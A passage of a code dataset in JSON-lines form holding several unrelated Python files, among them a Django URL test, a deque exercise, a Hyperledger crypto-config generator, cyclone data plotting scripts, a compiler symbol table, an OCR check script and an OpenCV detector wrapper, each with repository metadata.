change_matrix_task_state)\n", "repo_name": "AntoineMaurin/Melius", "sub_path": "matrix/tests/integration/test_urls.py", "file_name": "test_urls.py", "file_ext": "py", "file_size_in_byte": 2206, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.test.TestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "tasks.models.SimpleTask.objects.get", "line_number": 15, "usage_type": "call"}, {"api_name": "tasks.models.SimpleTask.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tasks.models.SimpleTask", "line_number": 15, "usage_type": "name"}, {"api_name": "tasks.models.TaskList.objects.get", "line_number": 18, "usage_type": "call"}, {"api_name": "tasks.models.TaskList.objects", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tasks.models.TaskList", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 23, "usage_type": "name"}, {"api_name": "tasks.models.TaskList.objects.create", "line_number": 26, "usage_type": "call"}, {"api_name": "tasks.models.TaskList.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tasks.models.TaskList", "line_number": 26, "usage_type": "name"}, {"api_name": "tasks.models.SimpleTask.objects.create", "line_number": 29, "usage_type": "call"}, {"api_name": "tasks.models.SimpleTask.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tasks.models.SimpleTask", "line_number": 29, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 31, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 33, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 37, "usage_type": "call"}, {"api_name": "matrix.views.coveys_matrix_page", "line_number": 37, "usage_type": "argument"}, {"api_name": "matrix.views.coveys_matrix_page", "line_number": 38, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 38, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 41, "usage_type": "call"}, {"api_name": "matrix.views.covey_sort_backlog", "line_number": 41, "usage_type": "argument"}, {"api_name": "matrix.views.covey_sort_backlog", "line_number": 42, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 42, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 45, "usage_type": "call"}, {"api_name": "matrix.views.update_matrix_task", "line_number": 45, "usage_type": "argument"}, {"api_name": "matrix.views.update_matrix_task", "line_number": 46, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 46, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 49, "usage_type": "call"}, {"api_name": "matrix.views.retire_task_from_matrix", "line_number": 49, "usage_type": "argument"}, {"api_name": "matrix.views.retire_task_from_matrix", "line_number": 50, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 50, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 53, "usage_type": "call"}, {"api_name": "matrix.views.change_matrix_task_state", "line_number": 53, "usage_type": "argument"}, {"api_name": "matrix.views.change_matrix_task_state", "line_number": 54, "usage_type": "argument"}, {"api_name": "django.urls.resolve", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "31225365511", "text": "from collections import deque\n\nfood = deque([int(x) for x in input().split(\", \")])\nstamina = deque([int(x) for x in input().split(\", \")])\nmountain_peaks = deque([[\"Vihren\", 80],\n [\"Kutelo\", 90],\n [\"Banski Suhodol\", 100],\n [\"Polezhan\", 60],\n [\"Kamenitza\", 70],\n ])\n\nmountain = []\n\nfor _ in range(7):\n current_food = food.pop()\n current_stamina = stamina.popleft()\n\n power = current_food + current_stamina\n\n if power >= mountain_peaks[0][1]:\n mountain.append(mountain_peaks.popleft()[0])\n\n if len(mountain) == 5:\n print(\"Alex did it! He climbed all top five Pirin peaks in one week -> @FIVEinAWEEK\")\n break\nelse:\n print(\"Alex failed! He has to organize his journey better next time -> @PIRINWINS\")\n\nif mountain:\n print(\"Conquered peaks:\")\n print(*mountain, sep=\"\\n\")\n", "repo_name": "Iliyan-H-Iliev/Python", "sub_path": "Advanced/Exam Preparation/Climb the Peaks.py", "file_name": "Climb the Peaks.py", "file_ext": "py", "file_size_in_byte": 925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 3, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 4, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "35316113195", "text": "import yaml\nimport json\nimport copy\nimport pyaml\nimport sys\n\n\n\nyaml.SafeDumper.ignore_aliases = lambda *args: True\n\ndef create_crypto(jsonData):\n print(\"\")\n print(\"Generating crypto-config...\")\n sys.stdout.flush()\n\n with open(\"./network/template/crypto-config-template.yaml\") as f:\n crypto_doc = yaml.load(f)\n\n peerOrgsArr = create_crypto_orgs(jsonData,crypto_doc)\n ordrArr = create_crypto_ordr(jsonData,crypto_doc)\n\n crypto_doc[\"PeerOrgs\"]=peerOrgsArr\n crypto_doc[\"OrdererOrgs\"][0][\"Specs\"] = ordrArr\n\n with open(\"./network/crypto-config.yaml\", \"w+\") as f:\n pyaml.dump(crypto_doc, f, vspacing=[2, 1])\n\n\ndef create_crypto_orgs(jsonData, crypto_doc):\n n_user = 1 # Hardocded for now\n peerOrgsArr = []\n for org in jsonData[\"organizations\"][\"peerOrgs\"]:\n peerOrgs = copy.deepcopy(crypto_doc[\"PeerOrgs\"][0])\n \n org_name = org[\"name\"]\n org_peer_count = org[\"count\"]\n org_url = org[\"url\"]\n\n peerOrgs[\"Name\"] = org_name.lower().capitalize()\n peerOrgs[\"Domain\"] = org_url\n peerOrgs[\"EnableNodeOUs\"] = True\n peerOrgs[\"Template\"][\"Count\"] = org_peer_count\n peerOrgs[\"Users\"][\"Count\"] = n_user\n peerOrgsArr.append(peerOrgs)\n \n return peerOrgsArr\n \ndef create_crypto_ordr(jsonData, crypto_doc):\n ordrArr = []\n\n for ordr in jsonData[\"organizations\"][\"ordererOrg\"][\"url\"]:\n ordrSpec = copy.deepcopy(crypto_doc[\"OrdererOrgs\"][0][\"Specs\"][0])\n ordrSpec[\"Hostname\"] = ordr.split(\".\")[0]\n ordrArr.append(ordrSpec)\n \n return ordrArr", "repo_name": "aditya520/fabric-starter", "sub_path": "scripts/create_crypto_config.py", "file_name": "create_crypto_config.py", "file_ext": "py", "file_size_in_byte": 1579, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "yaml.SafeDumper", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 14, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pyaml.dump", "line_number": 26, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 33, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "41601456773", "text": "from listener import MouseButtonListener, MediaKeyListener\nfrom volume_notification import VolumeNotification\n\nfrom Xlib import display\nfrom threading import Thread\nimport sys\n\nimport json\nimport os\nfrom xdg import BaseDirectory\n\ntry:\n import gtk\n import pygtk\n import pynotify\n pygtk.require('2.0')\nexcept:\n print(\"Error: need python-notify, python-gtk2 and gtk\")\n\n__version__ = \"2.0.0\"\n\nconfig_file = os.path.join(BaseDirectory.xdg_config_home,\n \"volctl2/settings.json\")\nif os.path.exists(config_file):\n config = json.load(open(config_file))\n cardindex = config[\"cardindex\"]\nelse:\n cardindex = 0\n\n\nclass GtkThread(Thread):\n \"\"\"\n This thread needs to run separately to handle button clicks on the volume\n \"\"\"\n def __init__(self):\n super(GtkThread, self).__init__()\n gtk.gdk.threads_init()\n\n def run(self):\n gtk.main()\n\n\ndef run():\n print(\"Volume Control v{}\".format(__version__))\n\n if not pynotify.init(\"Volume Control v{}\".format(__version__)):\n sys.exit(1)\n\n if not display.Display().has_extension(\"RECORD\"):\n print(\"RECORD extension not found\")\n sys.exit(1)\n\n notification = VolumeNotification(cardindex=cardindex)\n MouseButtonListener(notification).start()\n MediaKeyListener(notification).start()\n GtkThread().start()\n\n\nif __name__ == \"__main__\":\n run()\n", "repo_name": "WhyNotHugo/volctl2", "sub_path": "volctl2/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygtk.require", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "xdg.BaseDirectory.xdg_config_home", "line_number": 22, "usage_type": "attribute"}, {"api_name": "xdg.BaseDirectory", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 31, "usage_type": "name"}, {"api_name": "gtk.gdk.threads_init", "line_number": 37, "usage_type": "call"}, {"api_name": "gtk.gdk", "line_number": 37, "usage_type": "attribute"}, {"api_name": "gtk.main", "line_number": 40, "usage_type": "call"}, {"api_name": "pynotify.init", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 47, "usage_type": "call"}, {"api_name": "Xlib.display.Display", "line_number": 49, "usage_type": "call"}, {"api_name": "Xlib.display", "line_number": 49, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 51, "usage_type": "call"}, {"api_name": "volume_notification.VolumeNotification", "line_number": 53, "usage_type": "call"}, {"api_name": "listener.MouseButtonListener", "line_number": 54, "usage_type": "call"}, {"api_name": "listener.MediaKeyListener", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "44395444107", "text": "import numpy as np\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nimport warnings\r\nimport xarray as xr\r\n# from scipy.signal import find_peaks\r\nfrom matplotlib import cm\r\nfrom matplotlib.colors import ListedColormap\r\n\r\n\r\nos.chdir( \"/Users/etmu9498/research/code/scripts\")\r\nimport make_plots\r\nimport tc_metadata\r\nimport helper_fns\r\n\r\n# this is an attempt to get clip_old_data to load...\r\nimport sys\r\nsys.path.append(\"/Users/etmu9498/research/code/scripts/in-situ-scripts/\")\r\nos.chdir( \"/Users/etmu9498/research/code/scripts/in-situ-scripts/\")\r\nimport load_in_situ_data\r\nimport clip_old_data\r\n\r\n\r\ndef plot_multi_passes( tc='all'):\r\n\r\n # put tcname into a list to make the for loop work correctly\r\n if tc == 'all':\r\n tcname_list = ['grace', 'henri', 'ida', 'sam']\r\n else:\r\n tcname_list = [ tc]\r\n\r\n for tcname in tcname_list:\r\n warnings.filterwarnings(\"ignore\")\r\n\r\n metadata = tc_metadata.all_data( tcname)\r\n if metadata == 'selected TC name is not yet implemented':\r\n print( metadata)\r\n return\r\n\r\n print( \"\\nTC \" + metadata['tc_name'])\r\n print( 'Number of crl files: ' + str( len( metadata['xlims'] ))+ '\\n')\r\n\r\n for dataset in range( len( metadata[ 'dates'] )):\r\n\r\n if metadata[ 'xlims'] [ dataset][0] > 0.0:\r\n axis = 'lat'\r\n else:\r\n axis = 'lon'\r\n\r\n # load data\r\n os.chdir( metadata['crl_path'] )\r\n crl_data = tc_metadata.choose_crl_date( metadata['dates'][dataset], metadata['crl_list'] )\r\n\r\n os.chdir( metadata['in_situ_path'] )\r\n in_situ_data = tc_metadata.choose_in_situ_date( metadata['dates'][dataset], metadata['in_situ_list'] )\r\n\r\n # xlims = [ metadata['xlims'][dataset][0], metadata['xlims'][dataset][1] ]\r\n xname = metadata['xtype'][dataset]\r\n xlim = metadata['xlims'][dataset]\r\n title = \"In Situ Data, TC \" + metadata['tc_name'] + \", \" + metadata['dates'][ dataset] + \", Eye Pass \" + metadata['eye_pass'][ dataset]\r\n\r\n helper_fns.change_font_sizes()\r\n plot_one_cross_section( metadata['crl_path'], crl_data, metadata['in_situ_path'], in_situ_data, metadata['crl_range'][dataset], axis, xlim, xname, title)\r\n\r\n # save the figure!\r\n os.chdir( \"/Users/etmu9498/research/figures/in-situ-only/\")\r\n plt.savefig( metadata['tc_name'].casefold() + \"-\" + str( dataset+1) + \".png\" )\r\n print( \"Image \" + str( dataset + 1) + \" complete\" )\r\n\r\n\r\n\r\ndef plot_one_cross_section( crl_path, crl_name, flight_data_path, flight_name, cutoff_indices, xaxis, xlim='none', xname='none', title='none'):\r\n\r\n warnings.filterwarnings(\"ignore\")\r\n\r\n # load and process the data\r\n xr_in_situ = load_in_situ_data.load_in_situ( flight_data_path, flight_name, sample_step_size=1)\r\n\r\n # rename variables from xarray for convenience\r\n str_time = xr_in_situ.str_time\r\n float_time = xr_in_situ.float_time\r\n\r\n keyList = [ 'WS.d', 'WD.d', 'UWZ.d', 'ASfmrRainRate.1', 'LATref', 'LONref',\r\n 'TAS.d', 'HT.d', 'TTMref']\r\n # make an empty dict that will be filled soon!\r\n datatrim = {key: None for key in keyList}\r\n\r\n for key in keyList:\r\n datatrim[ key] = clip_old_data.in_situ_helper( crl_path, crl_name, cutoff_indices, xr_in_situ[ key].values, float_time)\r\n\r\n ws, wd, uwz = datatrim['WS.d'], datatrim['WD.d'], datatrim['UWZ.d']\r\n rr, lat, lon = datatrim['ASfmrRainRate.1'], datatrim['LATref'], datatrim['LONref']\r\n tas, height, temp2 = datatrim['TAS.d'], datatrim['HT.d'], datatrim['TTMref']\r\n\r\n if xaxis == \"time\":\r\n xaxis_data = float_time\r\n xlabel = 'Time (UTC, Hours)'\r\n elif xaxis == \"lon\":\r\n xaxis_data = lon\r\n xlabel = 'Longitude (Degrees)'\r\n elif xaxis == \"lat\":\r\n xaxis_data = lat\r\n xlabel = 'Latitude (Degrees)'\r\n elif xaxis == 'dist':\r\n print( 'add distance option to in_situ_multi panels if statement!')\r\n return\r\n else:\r\n print( \"Please choose 'lon', 'lat', 'time', or 'dist' as a valid xaxis!\")\r\n\r\n\r\n # find tangential wind speed and p-3 height minima! plot them to compare\r\n wsmin = np.nanmin( ws)\r\n wsmin_ind = np.nanargmin( ws)\r\n\r\n heightmin = np.nanmin( height)\r\n heightmin_ind = np.nanargmin( height)\r\n\r\n fig = plt.figure( figsize=(14, 16) )\r\n ax1 = fig.add_subplot(311)\r\n\r\n ax1.plot( xaxis_data, ws, color='r')\r\n # calling this twice to set ylabel size correctly! doesn't work the first time\r\n ax1.set_ylabel('Tangential Wind Speed (m/s)', color='r')\r\n\r\n # plot vertical lines representing wind speed and height minima\r\n # ax1.axvline( x= xaxis_data[ wsmin_ind], c='r')\r\n # ax1.axvline( x=xaxis_data[ heightmin_ind], c='y')\r\n\r\n ax1.xaxis.grid( )\r\n ax1.yaxis.grid( )\r\n if title != 'none':\r\n ax1.set_title( title)\r\n if xlim != 'none':\r\n ax1.set_xlim( xlim)\r\n\r\n ax2 = ax1.twinx()\r\n ax2.plot( xaxis_data, uwz, color='k')\r\n ax2.set_ylabel('Vertical Wind Speed (m/s)', color='k')\r\n # ax2.set_ylim([-.5, 15])\r\n\r\n ax3 = fig.add_subplot(312)\r\n ax3.plot( xaxis_data, tas, c='darkgreen')\r\n ax3.set_ylabel('P-3 True Air Speed (m/s)', color='g')\r\n ax3.xaxis.grid( )\r\n ax3.yaxis.grid( )\r\n if xlim != 'none':\r\n ax3.set_xlim( xlim)\r\n\r\n ax4 = ax3.twinx()\r\n ax4.plot( xaxis_data, rr, color='b')\r\n ax4.set_ylabel( ' SFMR Rain Rate (mm/hr)', color='b')\r\n\r\n ax5 = fig.add_subplot(313)\r\n ax5.plot( xaxis_data, height, c='y')\r\n ax5.set_ylabel('P-3 Height (m)', c='y')\r\n ax5.xaxis.grid( )\r\n ax5.yaxis.grid( )\r\n # ax5.set_ylim( [ 2500, 3300])\r\n\r\n # plot vertical lines representing wind speed and height minima\r\n # ax5.axvline( x= xaxis_data[ wsmin_ind], c='r')\r\n # ax5.axvline( x=xaxis_data[ heightmin_ind], c='y')\r\n\r\n\r\n ax6 = ax5.twinx()\r\n ax6.plot( xaxis_data, temp2, c='c')\r\n ax6.set_ylabel('Flight Level Temperature (C)', c='c')\r\n\r\n if xlim != 'none':\r\n ax5.set_xlim( xlim)\r\n\r\n # plt.tight_layout()\r\n if xname == 'lon':\r\n ax5.set_xlabel( \"Longitude (Degrees)\")\r\n elif xname == 'time':\r\n ax5.set_xlabel( \"Time (UTC, Hours)\")\r\n elif xname == 'lat':\r\n ax5.set_xlabel( \"Latitude (Degrees)\")\r\n\r\n warnings.filterwarnings(\"ignore\")\r\n\r\n\r\n\r\ndef make_one_subplot( crl_path, crl_name, flight_data_path, flight_name, cutoff_indices, subplot=414):\r\n\r\n warnings.filterwarnings(\"ignore\")\r\n\r\n # load and process the data\r\n\r\n os.chdir( flight_data_path)\r\n xr_in_situ = xr.open_dataset( flight_name)\r\n\r\n # rename variables from xarray for convenience\r\n str_time = xr_in_situ.str_time\r\n float_time = xr_in_situ.float_time\r\n\r\n keyList = [ 'distance', 'WS.d', 'HT.d', 'PSURF.d']\r\n # make an empty dict that will be filled soon!\r\n datatrim = {key: None for key in keyList}\r\n\r\n\r\n for key in keyList:\r\n datatrim[ key] = clip_old_data.in_situ_helper( crl_path, crl_name, cutoff_indices, xr_in_situ[ key].values, float_time)\r\n\r\n xaxis_data, ws, height, psurf = datatrim['distance'], datatrim['WS.d'], datatrim['HT.d'], datatrim['PSURF.d']\r\n\r\n\r\n fig = plt.gcf()\r\n ax1 = fig.add_subplot( subplot)\r\n\r\n ax1.plot( xaxis_data, height, c='y')\r\n ax1.set_ylabel('P-3 Height (m)', c='y')\r\n # ax1.set_ylim( [ 2500, 3300])\r\n ax1.xaxis.grid( )\r\n ax1.yaxis.grid( )\r\n\r\n ax2 = ax1.twinx()\r\n ax2.plot( xaxis_data, ws, c='c')\r\n ax2.set_ylabel( 'Wind Speed (m/s)', c='c')\r\n\r\n ax3 = ax1.twinx()\r\n ax3.plot( xaxis_data, psurf, c='r')\r\n ax3.set_ylabel( 'Surface P (hPa)', c='r')\r\n ax3.spines.right.set_position((\"axes\", 1.1))\r\n\r\n\r\n warnings.filterwarnings(\"ignore\")\r\n", "repo_name": "ethanmur/tc-research", "sub_path": "code/scripts/in-situ-scripts/in_situ_multi_panels.py", "file_name": "in_situ_multi_panels.py", "file_ext": "py", "file_size_in_byte": 7735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 12, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 20, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 34, "usage_type": "call"}, {"api_name": "tc_metadata.all_data", "line_number": 36, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 52, "usage_type": "call"}, {"api_name": "tc_metadata.choose_crl_date", "line_number": 53, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 55, "usage_type": "call"}, {"api_name": "tc_metadata.choose_in_situ_date", "line_number": 56, "usage_type": "call"}, {"api_name": "helper_fns.change_font_sizes", "line_number": 63, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 75, "usage_type": "call"}, {"api_name": "load_in_situ_data.load_in_situ", "line_number": 78, "usage_type": "call"}, {"api_name": "clip_old_data.in_situ_helper", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.nanargmin", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.nanmin", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.nanargmin", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 181, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 187, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 191, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 192, "usage_type": "call"}, {"api_name": "clip_old_data.in_situ_helper", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 228, "usage_type": "call"}]} +{"seq_id": "22757105691", "text": "\"\"\"SymbolTable class for static semantic analyzer.\n\nTypical usage example:\n new_st = SymbolTable(new_cio)\n st_instance.enter_scope()\n st_instance.exit_scope()\n se_instance.enter_symbol(\"column_index\", \"const\")\n se_instance.enter_symbol(\"x\")\n se_instance.find_symbol(\"j\")\n\"\"\"\n\nfrom typing import Dict, List\nimport chario\nfrom symbol_entry import SymbolEntry as SymEnt\n\n\nclass SymbolTable(object):\n \"\"\"A stack of dictionaries containing identifier information.\n\n Attributes:\n stack: A list of dictionaries with string keys and SymbolEntry values.\n level: An integer representing current scope level.\n chario: A Chario instance for error submission.\n \"\"\"\n\n def __init__(self, cio: chario.Chario) -> None:\n \"\"\"Init with Chario instance.\"\"\"\n self.stack: List[Dict[str, SymEnt]] = list()\n self.level: int = -1\n self.chario: chario.Chario = cio\n\n def enter_scope(self) -> None:\n \"\"\"Increment level attribute and push new symbol table onto stack.\n\n Print level number if given verbose option.\n \"\"\"\n self.stack.append(dict())\n self.level += 1\n if self.chario.is_verbose:\n print(\"*** Entered level {}\".format(self.level))\n\n def exit_scope(self) -> None:\n \"\"\"Decrement level attribute and pop last symbol table in stack.\n\n Print level number and symbol table if given verbose option.\n \"\"\"\n table: Dict[str, SymEnt] = self.stack.pop()\n if self.chario.is_verbose:\n self.__print_table(table)\n print(\"*** Exited level {}\".format(self.level))\n self.level -= 1\n\n def __print_table(self, table: Dict[str, SymEnt]) -> None:\n \"\"\"Convert single symbol table into string.\n\n Args:\n table: A ditionary with string keys and SymbolEntry values.\n \"\"\"\n print(\"*** Symbol table for level {}\".format(self.level))\n for s in table.values():\n print(s)\n\n def enter_symbol(self, key: str, role: str = None) -> SymEnt:\n \"\"\"Enter new symbol into current symbol table.\n\n Add error to Chario instance if symbol had been previously declared.\n\n Args:\n key: A string of identifier name.\n role: A string of identifier role.\n\n Returns:\n A SymbolEntry instance corresponding to newly added identifier.\n \"\"\"\n table: Dict[str, SymEnt] = self.stack[-1]\n if key in table:\n self.chario.put_error(\"Identifier already declared in this block.\")\n return None\n else:\n s: SymEnt = SymEnt(key, role) if role else SymEnt(key)\n table[key] = s\n return s\n\n def find_symbol(self, key: str) -> SymEnt:\n \"\"\"Find symbol in current symbol table.\n\n Add error to Chario instance if symbol had been previously not declared.\n\n Args:\n key: A string of identifier name.\n\n Returns:\n A SymbolEntry instance corresponding to identifier to be found.\n \"\"\"\n for i in range(len(self.stack) - 1, -1, -1):\n table: Dict[str, SymEnt] = self.stack[i]\n if key in table:\n return table[key]\n self.chario.put_error(\"Undeclared identifier\")\n return None\n", "repo_name": "clearjade-kr/pl_project_copy", "sub_path": "build/5_P2_source/symbol_table.py", "file_name": "symbol_table.py", "file_ext": "py", "file_size_in_byte": 3292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "chario.Chario", "line_number": 26, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 28, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 28, "usage_type": "name"}, {"api_name": "chario.Chario", "line_number": 30, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 47, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 53, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 75, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 75, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 80, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 63, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 96, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 96, "usage_type": "name"}, {"api_name": "symbol_entry.SymbolEntry", "line_number": 84, "usage_type": "name"}]} +{"seq_id": "1812058221", "text": " \ntry:\n from PIL import Image\nexcept ImportError:\n import Image\nimport pytesseract\nimport sys\nimport configparser\nimport os\nimport cv2\n\nimport re\n#-- include('examples/showgrabfullscreen.py') --#\nimport pyscreenshot as ImageGrab\n\nimport configparser\nfrom configparser import ConfigParser\n\ndef contem(texto, busca):\n if texto.rfind(busca) != -1:\n return True\n else:\n return False\n \n\nconfig = configparser.ConfigParser()\nconfig.read('files/configuracoes.ini')\nparser = ConfigParser()\nparser.read('files/configuracoes.ini') \n\nimg = cv2.imread(r'files/temp/saebi05.png')\nimagem = cv2.bitwise_not(img) \n\nsas24 = str(config['checagens']['sas24'])\nsas08 = str(config['checagens']['sas08'])\nsrtbi01 = str(config['checagens']['srtbi01'])\n\n\ntext = pytesseract.image_to_string(Image.fromarray(imagem),lang='por', config=\"--user-words files/words.txt\")\n\ntext = text.replace(\"\\n\",\"\")\ntext = text.lower()\nprint(text)\nprint('\\n\\n\\n>\\n\\n\\n')\n\n#Checagem Sas24\nif contem(text, '675 - sasbu24'):\n print('SAS24') \n\n#Checagem sas08\nelif contem(text, '700 - sasbi'): \n print('SAS08') \n\n#Checagem Srtbi01\nelif contem(text, '1125 - srtbi'): \n print('SRTBI01') \n\n#Checagem saebi05\nelif contem(text, '1450 - saebi'):\n print('saebi05')\nprint(\"\\n\\n numeros:\")\n\ntext = text.replace(\".\",\"\")\ntext = text.replace(\",\",\".\")\nprint(text)\nprint('\\n\\n\\n>\\n\\n\\n')\n\nsaebi05 = float(re.findall(\"\\d+\\.\\d+\", text)[0])\n\nprint('saebi05 :',saebi05)\n \n\nif(saebi05 < 500):\n print(\"checagem Valida !\")\nelse:\n print(\"checagem invalida\")\n\n\nos.system(\"pause\")", "repo_name": "MateusAlvarenga/BatchSlave", "sub_path": "BatchSlave2/testechecagens.py", "file_name": "testechecagens.py", "file_ext": "py", "file_size_in_byte": 1609, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "configparser.ConfigParser", "line_number": 26, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 32, "usage_type": "call"}, {"api_name": "pytesseract.image_to_string", "line_number": 39, "usage_type": "call"}, {"api_name": "Image.fromarray", "line_number": 39, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "os.system", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "1673082129", "text": "import os\r\nimport cv2\r\n\r\nclass NNService:\r\n\r\n def __init__(self):\r\n nn_model_file = os.path.join('.', 'src', 'model', 'MobileNetSSD_deploy.caffemodel') \r\n nn_proto_file = os.path.join('.', 'src', 'model', 'MobileNetSSD_deploy.prototxt.txt') \r\n\r\n self.neural_network = cv2.dnn.readNetFromCaffe(nn_proto_file, nn_model_file)\r\n print (\"NNService created\")\r\n\r\n def detect (self, frame):\r\n print (f\"NNService REQUEST PARAMS: frame {frame.shape}\")\r\n frame = cv2.resize(frame, (300, 300))\r\n blob = cv2.dnn.blobFromImage(frame, 0.007843, (300, 300), 127.5)\r\n self.neural_network.setInput(blob)\r\n detections = self.neural_network.forward()\r\n print('NNService RESPONSE Success')\r\n return detections\r\n", "repo_name": "programmerkz/NN_detectors_over_gRPC", "sub_path": "src/nn_service.py", "file_name": "nn_service.py", "file_ext": "py", "file_size_in_byte": 773, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "cv2.dnn.readNetFromCaffe", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 16, "usage_type": "attribute"}]} +{"seq_id": "45119885320", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport requests\nimport pprint\nfrom sklearn.cluster import KMeans\nimport folium\n\ndata = 